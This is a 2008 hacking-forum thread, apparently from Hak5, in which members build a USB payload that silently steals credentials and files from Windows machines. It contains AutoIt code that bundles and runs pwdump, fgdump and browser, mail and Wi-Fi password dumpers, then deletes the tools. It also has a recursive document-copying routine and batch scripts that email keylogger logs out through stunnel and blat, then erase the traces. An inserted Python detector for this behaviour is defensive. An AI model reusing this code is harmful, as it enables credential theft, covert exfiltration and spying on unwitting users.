jrsmile Posted November 3, 2008

I rewrote the fetching part so it is only one executable. Here is the code:

#AutoIt3Wrapper_Change2CUI=y
#include <Constants.au3>

FileInstall("pwdump.exe", @ScriptDir & "\pwdump.exe")
FileInstall("pwdump7.exe", @ScriptDir & "\pwdump7.exe")
FileInstall("fgdump.exe", @ScriptDir & "\fgdump.exe")
FileInstall("netpass.exe", @ScriptDir & "\netpass.exe")
FileInstall("firepassword.exe", @ScriptDir & "\firepassword.exe")
FileInstall("mailpv.exe", @ScriptDir & "\mailpv.exe")
FileInstall("ChromePass.exe", @ScriptDir & "\ChromePass.exe")
FileInstall("mspass.exe", @ScriptDir & "\mspass.exe")
FileInstall("pspv.exe", @ScriptDir & "\pspv.exe")
FileInstall("produkey.exe", @ScriptDir & "\produkey.exe")
FileInstall("wul.exe", @ScriptDir & "\wul.exe")
FileInstall("portqry.exe", @ScriptDir & "\portqry.exe")
FileInstall("wifike.exe", @ScriptDir & "\wifike.exe")
FileInstall("servpw.exe", @ScriptDir & "\servpw.exe")
FileInstall("libeay32.dll", @ScriptDir & "\libeay32.dll")

ConsoleWrite(GetOutputOf('pwdump.exe 127.0.0.1'))
ConsoleWrite(GetOutputOf('pwdump7.exe'))
ConsoleWrite(GetOutputOf('fgdump.exe -vv -c'))
ConsoleWrite(GetOutputOf('netpass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('firepassword.exe'))
ConsoleWrite(GetOutputOf('mailpv.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('ChromePass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('mspass.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('pspv.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('produkey.exe /nosavereg /stext tmpfile'))
ConsoleWrite(GetOutputOf('vul.exe /stext tmpfile'))
ConsoleWrite(GetOutputOf('portqry.exe -local -v -v'))
ConsoleWrite(GetOutputOf('wifike.exe /stext tmpfile'))

$search = FileFindFirstFile(@ScriptDir & "\*.*")
While 1
    $file = FileFindNextFile($search)
    If @error Then ExitLoop
    if $file = "start.exe" then ContinueLoop
    if $file = "start.au3" then ContinueLoop
    if $file = "output.txt" then ContinueLoop
    FileDelete($file)
WEnd
FileClose($search)

Func GetOutputOf($cmd)
    Local $foo = Run(@ScriptDir & '\' & $cmd, @ScriptDir, @SW_HIDE, $STDERR_CHILD + $STDOUT_CHILD)
    Local $line, $output, $headder = '##############################################' & @CRLF & $cmd & @CRLF & '##############################################' & @CRLF
    While 1
        $line = StdoutRead($foo)
        If @error Then ExitLoop
        $output &= $line
    WEnd
    If StringInStr($cmd, "tmpfile") Then
        $output = FileRead(@ScriptDir & '\tmpfile')
        FileDelete(@ScriptDir & '\tmpfile')
    EndIf
    Return $headder & $output
EndFunc   ;==>GetOutputOf

Attached you find the link to the exe. Because all executables that fetch information are included in the exe, it is 1.936.652 kb in size; unfortunately the forum lets me upload only 500kb ... If you execute the file it will extract the executables bound to the attached exe, then start them with the parameters you see in the source code. The output of the interim text files will be piped into the DOS console, so a simple call of start.exe >> output.txt will be enough to get all information of the device :-) THIS IS JUST FOR INFORMATION GATHERING, NO KEYLOGGERS ETC WILL BE INSTALLED. Best regards, J. Btw: if you need "special development" of custom software feel free to contact me. Here is the link: start.exe
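A defender-side check, added here as an example and not part of jrsmile's post or the payload: given constructed process-creation records in an assumed pipe-separated format, it flags the binaries named above, the /stext export switch the wrapper relies on, and any parent that launches several of them in a row, which is the pattern start.exe produces.

```python
"""Added detection example (not the forum's code). Flags the behaviour the
wrapper above produces: one parent launching several password-recovery
utilities, some of them with the "/stext" report switch.
Assumed input format (constructed): "timestamp|parent_image|image|commandline"
"""
import re

# Binaries the post bundles; lower-case so matching is case-insensitive
HARVEST_TOOLS = {
    "pwdump.exe", "pwdump7.exe", "fgdump.exe", "netpass.exe",
    "firepassword.exe", "mailpv.exe", "chromepass.exe", "mspass.exe",
    "pspv.exe", "produkey.exe", "wifike.exe", "servpw.exe",
}
# The wrapper calls the tools with "/stext tmpfile" and reads the file back
STEXT_RE = re.compile(r"(^|\s)/stext\b", re.IGNORECASE)

def basename(path):
    """Final component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()

def parse_event(line):
    ts, parent, image, cmdline = line.rstrip("\r\n").split("|", 3)
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}

def score_event(ev):
    """Reasons one event looks like credential harvesting ([] if none).
    A renamed binary still trips the /stext check; a renamed tool run
    without /stext trips neither, hence the parent-level correlation."""
    reasons = []
    if basename(ev["image"]) in HARVEST_TOOLS:
        reasons.append("known credential-recovery binary")
    if STEXT_RE.search(ev["cmdline"]):
        reasons.append("/stext report export")
    return reasons

def find_wrappers(lines, min_tools=3):
    """Map parent image -> sorted flagged child names for every parent that
    spawned at least min_tools distinct flagged children. A single flagged
    child (an admin running produkey by hand) stays below the threshold."""
    children = {}
    for line in lines:
        ev = parse_event(line)
        if score_event(ev):
            children.setdefault(ev["parent"], set()).add(basename(ev["image"]))
    return {p: sorted(c) for p, c in children.items() if len(c) >= min_tools}

# Constructed sample: four tools from one wrapper on a removable drive,
# plus two events from explorer.exe that should not be correlated
SAMPLE_LOG = """\
2008-11-03T10:00:01|E:\\start.exe|E:\\pwdump7.exe|pwdump7.exe
2008-11-03T10:00:02|E:\\start.exe|E:\\fgdump.exe|fgdump.exe -vv -c
2008-11-03T10:00:03|E:\\start.exe|E:\\netpass.exe|netpass.exe /stext tmpfile
2008-11-03T10:00:04|E:\\start.exe|E:\\mailpv.exe|mailpv.exe /stext tmpfile
2008-11-03T10:00:05|C:\\Windows\\explorer.exe|C:\\Windows\\notepad.exe|notepad.exe report.txt
2008-11-03T10:01:00|C:\\Windows\\explorer.exe|C:\\Tools\\produkey.exe|produkey.exe
""".splitlines()

if __name__ == "__main__":
    for parent, tools in find_wrappers(SAMPLE_LOG).items():
        print(f"{parent}: launched {len(tools)} harvesting tools: {', '.join(tools)}")
```

A file-event source would add a second signal: a short-lived "tmpfile" written and deleted in the same directory as each tool.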
X3N Posted November 3, 2008

Did you see my topic of the version I wrote in AutoIt? I was considering doing it with FileInstall but hadn't gotten that far yet; I wanted to get the rest of it working well first. This was my next task, because I wanted to be able to push it via networking and then execute it on a remote computer... good work!!! Here is a link to my topic with my code... http://hak5.org/forums/index.php?showtopic=10486
jrsmile Posted November 3, 2008

I forgot to mention that if you need any changes I will be glad to help you change the code or rewrite it for you :-)
X3N Posted November 3, 2008

> I forgot to mention that if you need any changes I will be glad to help you change the code or rewrite it for you :-)

Can you post a zip containing the source and the rest of the files?
X3N Posted November 3, 2008

> Can you post a zip containing the source and the rest of the files?

Never mind, I found everything...
jrsmile Posted November 4, 2008

> Never mind, I found everything...

Sorry, I don't look in the forum too often, once or twice a day.. If you need help please PM me :)
Romulus Posted November 4, 2008

Is it possible to autorun when a machine is locked by an admin?
jrsmile Posted November 5, 2008

> Is it possible to autorun when a machine is locked by an admin?

If the admin has autorun enabled, which is true by default, then yes :-)
noir Posted November 5, 2008

> Is it possible to autorun when a machine is locked by an admin?

I don't believe so, at least not in XP. Just as autorun doesn't work when a user is not logged in.
DMilton Posted November 5, 2008

> Is it possible to autorun when a machine is locked by an admin?

It's as easy as trying it... If you are looking for an answer like this, I think the best is to try it yourself... isn't it? ;)
elmer Posted November 7, 2008

> Will it search the entire computer?

It will recursively copy the contents of the directory in which it is run. If you run it from C:\ it will copy from all of C:\; if you run it from D:\ it would copy from all of D:\, and so on and so forth.
X3N Posted November 7, 2008

> It will recursively copy the contents of the directory in which it is run. If you run it from C:\ it will copy from all of C:\; if you run it from D:\ it would copy from all of D:\, and so on and so forth.

I just don't see how that's useful... What you need is a single script that searches the entire computer, like Linux find / |grep *.doc
noir Posted November 7, 2008

> I just don't see how that's useful... What you need is a single script that searches the entire computer, like Linux find / |grep *.doc

You can do that with the dir command; you'd just need to have it move to the root directory first.
X3N Posted November 7, 2008

> You can do that with the dir command; you'd just need to have it move to the root directory first.

Yeah, but can you write a shell script of some sort that recursively copies ALL files with a specific extension to one directory? And if you can, then post the code. In any language... preferably either bat or AutoIt or Python. My guess is that Python would be the fastest though.
X3N Posted November 7, 2008

Whoops, double post
Matessim Posted November 8, 2008

There's so much code floating around right now, like C+'s code; if someone will take responsibility and mash it up together with Leapo's code and some other things, it will pwn.
elmer Posted November 9, 2008

> I just don't see how that's useful... What you need is a single script that searches the entire computer, like Linux

Hm. I should get to work on that. I wonder if File.exist?("D:\.") would work to see if a drive existed. Unfortunately I don't really want to reboot right now, so I guess we will never know. And also, I'm fairly sure that a Ruby version will be just as good as a Python version; they are practically the same language anyway.
Matessim Posted November 10, 2008

Next time compile version 9.0 first, please, just compile it already, we provided all the VBC you need.
X3N Posted November 10, 2008

> Hm. I should get to work on that. I wonder if File.exist?("D:\.") would work to see if a drive existed. Unfortunately I don't really want to reboot right now, so I guess we will never know. And also, I'm fairly sure that a Ruby version will be just as good as a Python version; they are practically the same language anyway.

I like Ruby too.... I'm looking for source code too... that way it can be expanded on as well.
hacked_13 Posted November 10, 2008

Rewrote my crappy post. Okay, now I've officially read all 34 pages.. rawr!! I am king. lol anyway. Couple of things: love your work Leapo (can't spell and I'm too tired), great idea. I also think I know the problems in the sending of information over the Gmail accounts. I'll post new send files. Also, the start.bat script doesn't actually call the right file anyway.... I think this is due to you changing the files because you have not actually finished writing that part of the code. Or I could be wrong, in the start.bat. Anyway, I do know what I'm talking about in the sending part.

Keylog In Send.bat

GOTO setvariables

:sendfiles
:: Dump logs
pssuspend winlogon.exe
Recover.exe
pssuspend -r winlogon.exe

:: Selects where to grab logs from
if exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO AdminRights
if not exist %systemroot%\$NtUninstallKB931552$\winlogon.exe GOTO TryAlternate

:TryAlternate
if exist %appdata%\klgr\winlogon.exe GOTO Recover
if not exist %appdata%\klgr\winlogon.exe GOTO NoRights

::If admin rights are found, email logs this way
:AdminRights
:: Archive log in 1MB chunks
rar a %computername%keylog.rar %systemroot%\keylog.txt -v1024k -vn
stunnel-4.11.exe -install -quiet
net start stunnel
for %%i in (%systemroot%\%computername%keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099
GOTO cleanup

::If adminrights are not found, email logs this way
:NoRights
:: Archive log in 1MB chunks
rar a keylog.rar %appdata%\keylog.txt -v1024k -vn
stunnel-4.11.exe -install -quiet
net start stunnel
for %%i in (%appdata%\keylog.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099
GOTO cleanup

:Cleanup
:: Stop stunnel
rem taskkill /f /im stunnel-4.11.exe (??)
net stop stunnel
stunnel-4.11.exe -uninstall -quiet
:: Delete documents
rmdir /s /q docs
::Not sure what ^^ line does cause there should not be a docs folder due to the no hacksaw...
:: Delete archive
::For Admin Rights
del /q /f %systemroot%\%computername%keylog.r*.*
::For No Admin Rights
del /q /f %appdata%\keylog.r*.*
GOTO end

:setvariables

This is only minor clean-up code and the bold computer name part. You weren't actually sending anything... That should "theoretically" fix the sending of the keylogs. The Hacksaw sending is fine, but I don't have an awesome deal of knowledge of cmd to understand the NMAP one.

NMAP send_partial

GOTO Setvariables
:sendfiles

So I gather that :sendfiles means that it is defining that when you say later to go to this point, which is wrong.. cause you already define it later on:

:sendfiles
for %%i in (%computername%.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099
GOTO cleanup

So defining it twice I believe would make Windows chuck a hissy :D (I think.. correct me if I'm wrong.) So unless I am wrong (which I probably will be), getting rid of the first ":sendfiles" SHOULD fix it. As well as:

send_partial for nmap

:cleanup
:: Stop stunnel
rem taskkill /f /im stunnel-4.11.exe (??)
net stop stunnel
stunnel-4.11.exe -uninstall -quiet
:: Delete documents
:: Delete archive
rmdir /s /q %systemroot%\$NtUninstallKB91338$
GOTO end

You were actually deleting the wrong folder and not the archives. oo now I get it. But yes, you forgot the 8. Just small fixes :D Also add under ::Delete documents "del /q /f %computername%.*". Now the Nmap SHOULD send, as well as the keylogger, as long as it makes the logs correctly and in C:\ or wherever it's meant to be. Hope these actually work. I'm in the process of installing XP (stupid shit OS..... takes too long) on a virtual machine. So yeah, then I was going to try it :D Just thinking now as I was reading over it... that it does a 3 part send and 3 part clean up... fk it, I'm still posting. :P
jrsmile Posted November 11, 2008

Somebody requested slurping code in AutoIt?

_CopyAll("doc")

Func _CopyAll($type, $where = @HomeDrive, $to = "C:\HIDDEN\FOLDER\")
    Local $search = FileFindFirstFile($where & "\*.*"), $file
    If $search = -1 Then
        Return False
    EndIf
    While 1
        $file = FileFindNextFile($search)
        If @error Then ExitLoop
        If StringRight($file, 4) = "." & $type Then FileCopy($where & "\" & $file, $to, 9)
        If StringInStr(FileGetAttrib($where & "\" & $file), "D") Then Call("_CopyAll", $type, $where & "\" & $file)
    WEnd
    FileClose($search)
EndFunc   ;==>_CopyAll
X3N Posted November 11, 2008

Sweet, I'll have to try this out.
Matessim Posted November 12, 2008

This project is freezing, someone's gotta release VER 9, grr
DMilton Posted November 14, 2008

> This project is freezing, someone's gotta release VER 9, grr

In fact, I'm waiting for version 9 for something else I'm developing, but without Leapo... we can continue developing this stuff. The first thing we have to do is read the forum; there are very interesting things we can add to the payload, such as the MySQL+PHP way of sending the logs (and not only this). Moreover, some of us can contribute new ideas, but a working group is needed and a base on which to develop is needed too. Where's Leapo? If he wants to continue his work as he told us a couple of weeks ago, I'll be glad to contribute in the little I can; if he doesn't... I'll wait!
Tmbomber Posted November 15, 2008

> Where's Leapo?

Leapo said a couple of weeks ago that he can't do anything with the payload during the week. He's only working on it as he has time on weekends.